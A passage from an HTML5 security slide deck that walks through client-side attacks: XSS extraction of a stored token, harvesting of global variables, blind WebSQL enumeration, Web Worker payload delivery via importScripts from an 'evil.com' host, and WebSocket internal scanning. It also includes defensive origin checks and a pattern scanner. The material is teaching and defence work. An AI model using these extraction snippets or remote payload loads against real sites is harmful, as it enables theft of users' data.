            myblob.append('Token:091232432,name:Jack,auth:true');
            writer.write(myblob.getBlob('text/plain'));
        }, catcherror);
    }, catcherror);
}

Browsing filesystem:http://localhost/temporary/ shows the file and its content:

Index of filesystem:http://localhost/temporary/
Name      Size   Date Modified
profile   35 B   6/19/12 2:22:10 PM

Token:091232432,name:Jack,auth:true
Extraction through XSS

Once you have an entry point - game over!

function getProfile() {
    filesys.root.getFile('profile', {}, function(entry) {
        entry.file(function(file) {
            var reader = new FileReader();
            reader.onloadend = function(e) {
                alert(this.result);
            };
            reader.readAsText(file);
        }, catcherror);
    }, catcherror);
}
DOM Storage

• Applications run with a "rich" DOM

• JavaScript sets several variables and parameters while loading - GLOBALS

• They hold sensitive information - and what if they are GLOBAL and remain for the life of the application?

• They can be retrieved with XSS

• HTTP requests and responses go through JavaScript (XHR) - what about those vars?
Blind Enumeration

for (i in window) {
    obj = window[i];
    try {
        if (typeof(obj) == "string") {
            console.log(i);
            console.log(obj.toString());
        }
    } catch (ex) {}
}
Global Sensitive Information Extraction from DOM

HTML5 apps running on a single DOM

Having several key global variables, objects and arrays

- var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];

Post DOM based exploitation is possible, harvesting all these values.

Global Sensitive Information Extraction from DOM

for (i in window) {
    obj = window[i];
    if (obj != null) { // != null also excludes undefined
        var type = typeof(obj);
        if (type == "object" || type == "string") {
            console.log("Name:" + i)
            try {
                my = JSON.stringify(obj);
                console.log(my)
            } catch (ex) {}
        }
    }
}

Console output:

Name:arrayGlobals
["my@email.com","12141hewvsdr9321343423mjfdvint","test.com"]
Name:jsonGlobal
{"firstName":"John","lastName":"Smith","address":{"streetAddress":"21 2nd Street","city":"New York","state":"NY","postalCode":10021},"phoneNumbers":["212 732-1234","646 123-4567"]}
Name:stringGlobal
"test@test.com"
Scan and Defend

Scan and look for

- Scanning storage (localStorage, sessionStorage, filesystem) and globals

Defense and Countermeasures

- Do not store sensitive information in localStorage or in globals

- XSS protection
A5 - SQLi & Blind Enumeration

SQL Injection

WebSQL (a W3C specification whose work was stopped in 2010 but which WebKit browsers ship) provides a SQL database to the browser itself.

Allows one time data loading and offline browsing capabilities.

Causes security concern and potential injection points.

Methods and calls are possible

- openDatabase

- executeSql
SQL Injection

Through JavaScript one can harvest the entire local database.

Example (Chrome developer tools, Resources > Databases):

> SELECT * from Trans

id      text
100001  Transfer to John
100002  Transfer to Bob
Blind WebSQL Enumeration

We need the following to exploit

- Database object

- Table structure created on SQLite

- User table on which we need to run the select query
Blind WebSQL Enumeration

var dbo;
var table;
var usertable;
for (i in window) {
    obj = window[i];
    try {
        if (obj.constructor.name == "Database") {
            dbo = obj;
            obj.transaction(function(tx) {
                tx.executeSql('SELECT name FROM sqlite_master WHERE type=\'table\'', [], function(tx, results) {
                    table = results;
                }, null);
            });
        }
    } catch (ex) {}
}
// transaction() is asynchronous: run this once the callback has filled `table`
if (table.rows.length > 1)
    usertable = table.rows.item(1).name;
Blind WebSQL Enumeration

We run through all objects and take the one whose constructor is "Database"

We make a SELECT query directly against sqlite_master

We grab the 1st table, leaving the WebKit bookkeeping table (__WebKitDatabaseInfoTable__) at the 0th entry
Chrome developer tools on 192.168.100.27, querying the table found this way:

> SELECT * from ITEMS

Seven rows come back with the product columns (id, name, description, price, image), for example:

- "There are 3.7 trillion fish in the ocean, they're looking for one. The Academy Award-winning creators of..."
- "Who wants to cook Aloo Gobi when you can bend a ball like Beckham? An Indian family in London tries..."
- "David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of vi..."
- "An epic of miniature proportions. Life is no picnic for the ants on Ant Island! Each summer, a gang of gre..."
- "Once upon a time in India. Lagaan is the story of a battle without bloodshed fought by a group of unlikel..."
- "The Rain is coming... and so is the Family. An extended Punjabi family gathers for an arranged wedding..."
- "From the creators of The Bridge on the River Kwai. Sweeping epic about the real life adventures of T.E..."
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IndexedDB

Similar to WebSQL - it is available to
applications

Allows creating a database; it is an indexed
store

- indexedDB.open("transactions");

- db.createObjectStore

Possible to enumerate it like WebSQL, and
information extraction is possible


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A6 - Web Messaging and Web Workers injections


[Diagram: browser architecture with Mobile, SOP/CORS, Sandbox and Core Policies layers]
Web Messaging 


• HTML5 has a new inter-frame
communication system called Web Messaging.

• Through the postMessage() call, the parent frame/domain
can communicate with the iframe

• The iframe can be loaded cross-domain. Hence it
creates issues - data/information validation and
data leakage by cross posting are possible

• worker.webkitPostMessage - faster,
transferable objects


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Web Messaging - Scenario 


If the postMessage() target origin is set to *, the page can be
loaded in an iframe and the messaging can be
hijacked

Also, if the listener's origin check is not fixed, the frame
listens to any domain - again an issue

The incoming stream needs to be checked before it
reaches innerHTML or eval()

An iframe or Web Worker can glue two streams -
same domain or cross domain



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Origin check 



<script>

window.addEventListener('message', receiver, false);

function receiver(e)
{
    // Compare the sender's origin exactly before touching the DOM
    if (e.origin == 'http://192.168.100.123')
    {
        document.getElementById('p1').innerHTML = e.data;
    }
    else
    {
        alert("Different Origin");
        //alert(e.data);
    }
}

</script>
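Added example, not the slide's code: a receiver for the two points the scenario slide makes, an exact origin allowlist instead of a substring test, and a fixed target origin instead of '*' when replying, plus a shape check on the message and rendering through textContent so the data is never parsed as HTML. The allowlist entries (the 192.168.100.123 host from the slide plus an assumed second origin), the message shape {type: 'balance', text} and the element id p1 are assumptions for the demo.

```javascript
// Origins that may talk to this page (second entry is an assumption)
var ALLOWED_ORIGINS = ['http://192.168.100.123', 'https://app.example'];

// Exact, case-sensitive comparison of the whole origin string. Substring
// tests (indexOf, startsWith, a regex without anchors) are the usual mistake:
// they accept http://192.168.100.123.attacker.example as well.
function isAllowedOrigin(origin, allowlist) {
  return allowlist.indexOf(origin) !== -1;
}

// Accept only the documented message shape; anything else is dropped.
function parseMessage(data) {
  if (data === null || typeof data !== 'object') return null;
  if (data.type !== 'balance') return null;
  if (typeof data.text !== 'string' || data.text.length > 200) return null;
  return { type: 'balance', text: data.text };
}

// Decide what to do with one message event: the text to show, or null.
function handleMessageEvent(e, allowlist) {
  if (!isAllowedOrigin(e.origin, allowlist)) return null;
  var msg = parseMessage(e.data);
  return msg ? msg.text : null;
}

// Browser wiring; guarded so the module also loads outside a browser
if (typeof window !== 'undefined') {
  window.addEventListener('message', function (e) {
    var text = handleMessageEvent(e, ALLOWED_ORIGINS);
    if (text === null) return;
    // textContent shows markup as literal characters; innerHTML would run it
    document.getElementById('p1').textContent = text;
    // Reply to the verified origin only, never to '*'
    e.source.postMessage({ type: 'ack' }, e.origin);
  }, false);
}
```

The decision logic is kept in plain functions so it can be exercised without a browser: an origin that merely starts with the allowed value, a scheme mismatch (https for http), or a message that is a bare string all come back as null and nothing is rendered.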


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Web Worker - Hacks! 


Web Workers allow threading in HTML
pages using JavaScript

No need to use JavaScript calls like
setTimeout(), setInterval(), XMLHttpRequest,
and event handlers

Totally async and well supported
[initialize] var worker = new Worker('task.js');
[Messaging] worker.postMessage();


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Web Worker - Hacks! 





[Diagram: a background worker thread on the same page, exchanging messages with it]


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Web Worker - Hacks! 


Security issues

- It does not allow loading cross-domain worker
scripts (http:, https:, javascript:, data: - no)

- It has some typical issues

• It allows the use of XHR. Hence in-domain and CORS
requests are possible

• It can cause DoS - if the user gets a stream that runs a JavaScript
worker thread. It doesn't have access to the parent DOM
though

• Message validation is needed - else DOM based XSS


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Web Worker - Hacks! 


• Example

<html>

<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>

<output id="result"></output>

<script>

// Ask the worker for the last message it holds
function Read() {
    worker.postMessage({'cmd': 'read', 'msg': 'last'});
}

// Tell the worker to stop
function stop() {
    worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
    alert("Worker stopped");
}

// message.js runs in a background thread with no access to this DOM
var worker = new Worker('message.js');

// Whatever the worker sends back is written into the page as HTML:
// this is the DOM based XSS the previous slide warns about
worker.addEventListener('message', function (e) {
    document.getElementById('result').innerHTML = e.data;
}, false);

</script>

</html>


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Web Workers - Hacks! 


Possible to cause XSS

- Running script

- Passing a hidden payload

Also, web workers can help in embedding a silently
running JS file that can be controlled.

Can be a tool for payload delivery and control
within the browser framework

importScripts("http://evil.com/payload.js") - a
worker can run a cross domain script


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A 


Scan and Defend 


Scan and look for

- JavaScript scanning

- Messaging and Worker implementation

Defense and Countermeasures

- Same origin listening is a must for the message
event


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DOM with HTML5 
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DOM based XSS - Messaging 


It is a sleeping giant in Ajax applications
coupled with Web Messaging

Root cause

- DOM is already loaded

- Application is single page and the DOM remains the same

- New information coming in needs to be injected using
various DOM calls like eval()

- Information is coming from untrusted sources

- JSONP usage

- Web Workers and callbacks









AJAX with HTML5-DOM

The Ajax function makes a back-end call

The back-end returns a JSON stream or
any other format, and it gets injected into the DOM

In some libraries the content type
allows them to be loaded in the browser directly

In that case the DOM processing is bypassed...
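Added example, not from the slides: the Ajax response handling the two DOM slides describe, done without eval(). The body is accepted only when the back-end labels it application/json and it parses with JSON.parse; the parsed fields are then type-checked and placed in the DOM as text. Field names, the element id and the sample responses are constructed for the demo.

```javascript
// Returns the parsed object, or null when the response must be discarded.
function acceptJsonResponse(contentType, body) {
  var type = String(contentType || '').split(';')[0].trim().toLowerCase();
  if (type !== 'application/json') return null;   // text/html, text/javascript etc. are refused
  try {
    return JSON.parse(body);                        // strict parser, never a script evaluator
  } catch (err) {
    return null;                                    // JSONP wrappers or trailing code fail here
  }
}

// Builds the text shown for one transfer record; rejects unexpected shapes.
function describeTransfer(record) {
  if (!record || typeof record.id !== 'number' || typeof record.text !== 'string') return null;
  return record.id + ': ' + record.text;
}

// Browser wiring (element id assumed): textContent, not innerHTML or eval
function renderTransfer(record) {
  var line = describeTransfer(record);
  if (line === null || typeof document === 'undefined') return line;
  var el = document.createElement('li');
  el.textContent = line;
  document.getElementById('result').appendChild(el);
  return line;
}

// Constructed responses: a proper JSON reply, a JSONP-style reply, and a JSON
// reply with code appended after the object
var GOOD_RESPONSE = { type: 'application/json; charset=utf-8', body: '{"id":100002,"text":"Transfer to Bob"}' };
var JSONP_RESPONSE = { type: 'application/javascript', body: 'callback({"id":100002,"text":"Transfer to Bob"});' };
var TAMPERED_RESPONSE = { type: 'application/json', body: '{"id":100002,"text":"Transfer to Bob"};doSomething();' };
```

Both the JSONP reply and the tampered reply are dropped before anything touches the DOM: the first by the content-type check, the second because JSON.parse stops at the first character that is not JSON, where eval() would have kept going.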

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Scan and Defend 



Scan and look for 

- DOM calls 

- Use of eval(), document.* calls etc. 

Defense and Countermeasures 

- Secure JavaScript coding 
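Added example, not from the slides, serving this "Scan and Defend" slide and the earlier one for messaging and workers: a small pattern scanner for the constructs both name, postMessage() with a '*' target, message listeners that never look at the origin, innerHTML and eval() sinks, document.write(), and importScripts() of remote URLs. It is a line-based triage aid, not a JavaScript parser; the two sample sources are constructed.

```javascript
// One rule per construct the slides tell us to look for
var RULES = [
  { id: 'postmessage-wildcard', re: /postMessage\s*\([^)]*,\s*['"]\*['"]\s*\)/,
    note: "postMessage() with targetOrigin '*' can deliver data to any frame" },
  { id: 'eval-sink', re: /\beval\s*\(/,
    note: 'eval() on incoming data is a DOM XSS sink' },
  { id: 'innerhtml-sink', re: /\.innerHTML\s*=/,
    note: 'innerHTML assignment renders untrusted text as HTML' },
  { id: 'document-write', re: /document\.write(ln)?\s*\(/,
    note: 'document.write() injects markup into the live DOM' },
  { id: 'remote-importscripts', re: /importScripts\s*\(\s*['"]https?:\/\//,
    note: 'worker loads a script from a remote host' }
];

// Returns findings as {rule, line, note}; line numbers are 1-based,
// 0 for a whole-file finding.
function scanSource(source) {
  var findings = [];
  var lines = source.split('\n');
  for (var i = 0; i < lines.length; i++) {
    for (var r = 0; r < RULES.length; r++) {
      if (RULES[r].re.test(lines[i])) {
        findings.push({ rule: RULES[r].id, line: i + 1, note: RULES[r].note });
      }
    }
  }
  // A message listener in a file that never reads .origin cannot be doing the
  // same-origin check the defense slide requires.
  if (/addEventListener\s*\(\s*['"]message['"]/.test(source) && !/\.origin\b/.test(source)) {
    findings.push({ rule: 'message-listener-no-origin-check', line: 0,
      note: 'message listener registered but the event origin is never examined' });
  }
  return findings;
}

// Constructed sample: a receiver with no origin check, an HTML sink, a
// wildcard reply and a remote worker import
var RISKY_SOURCE = [
  "window.addEventListener('message', function (e) {",
  "  document.getElementById('p1').innerHTML = e.data;",
  "}, false);",
  "parent.postMessage(state, '*');",
  "importScripts('http://cdn.example/worker-lib.js');"
].join('\n');

// Constructed sample: the same page written the way the defense slides ask
var CLEAN_SOURCE = [
  "window.addEventListener('message', function (e) {",
  "  if (e.origin !== 'https://app.example') return;",
  "  document.getElementById('p1').textContent = String(e.data);",
  "}, false);",
  "parent.postMessage({type: 'ack'}, 'https://app.example');"
].join('\n');

console.log(scanSource(RISKY_SOURCE));
```

Run over the risky sample it reports the innerHTML sink on line 2, the wildcard postMessage on line 4, the remote importScripts on line 5 and the missing origin check; the clean sample produces nothing. Regex rules of this kind miss aliased calls and indirect sinks, so treat a clean result as "nothing obvious", not as a pass.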


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A8 - Third party/Offline HTML Widgets and Gadgets
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Offline Apps 


• HTML5 supports caching pages for offline
usage

• <html manifest="/appcache.manifest">

• The list of pages gets stored

• Attack and cache poisoning are possible

- An untrusted network or proxy can inject a malicious
script

- When you get onto the actual app that script gets
executed and keeps an eye on your activities
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HTML5 Widgets 


Widgets/Gadgets/Modules - popular with
HTML5 applications

Small programs that run inside the browser, using
Web Workers and Messaging

JavaScript and HTML based components

In some cases they share the same DOM - yes, the same
DOM

It can create cross-widget channels and
iframe/sandbox issues


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Cross DOM Access

HTML5 - Web Messaging and Workers

[Diagram: Widget 1, Widget 2 and Widget 3 (an Email Widget, an RSS Feed Reader and the Attacker's widget) all sitting on one shared DOM]

Setting the trap
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HTML5-Traps 


It is possible to access DOM events, variables,
logic etc.

A sandbox is required at the architecture layer to
protect against cross widget access

Segregating the DOM by iframe may help

Flash based widgets have their own issues as
well

Code analysis of widgets before allowing them to
load
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Web Sockets 


HTML5 allows Web Socket APIs - a full duplex
TCP channel through JavaScript

Allows cross domain connections like CORS

Possible threats

- Back door and browser shell

- Quick port scanning

- Botnets and malware can leverage it (one to many
connections)

- Sniffer based on Web Sockets
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Internal Scanning 


Allows internal scanning, setting up a hidden backward
channel, opening calls to proxy/cache.

Some browsers have blocked these calls for
security reasons.


[Screenshot: browser DevTools, Network panel, showing the WebSocket handshake request to 192.168.100.1]

Request URL: ws://192.168.100.1/

Request Headers
Connection: Upgrade
Host: 192.168.100.1
Origin: http://www.andlabs.org
Sec-WebSocket-Key1: 33 8 66 a 7 3 ' 5 31
Sec-WebSocket-Key2: 67 1= 87*1 $ 76 0]
Upgrade: WebSocket
(Key3): BC:11:F0:16:60:BC:50:C8
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A10 - Protocol/Schema/APIs attacks 

with HTML5 
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Custom protocol/schema 


HTML5 allows custom protocol and schema
registration

Example

- navigator.registerProtocolHandler("mailto",
"http://www.foo.com/?uri=%s", "My Mail");

It is possible to abuse this feature in certain
cases

The browser follows it, though the handler only gets registered for the same
domain
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• A few other HTML5 APIs are interesting from a
security standpoint

- File APIs - allow local file access and can be mixed
with Clickjacking and other attacks to gain access to client
files.

- Drag-Drop APIs - exploiting self XSS and a few other
tricks, hijacking cookies...

- Lots more to explore and defend...
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Resources/References 


• http://www.html5rocks.com/en/ (Solid stuff) 

• https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP stuff)

• http://html5sec.org/ (Quick Cheat sheet) 

• http://html5security.org/ (Good resources) 

• http://blog.kotowicz.net/ (Interesting work) 
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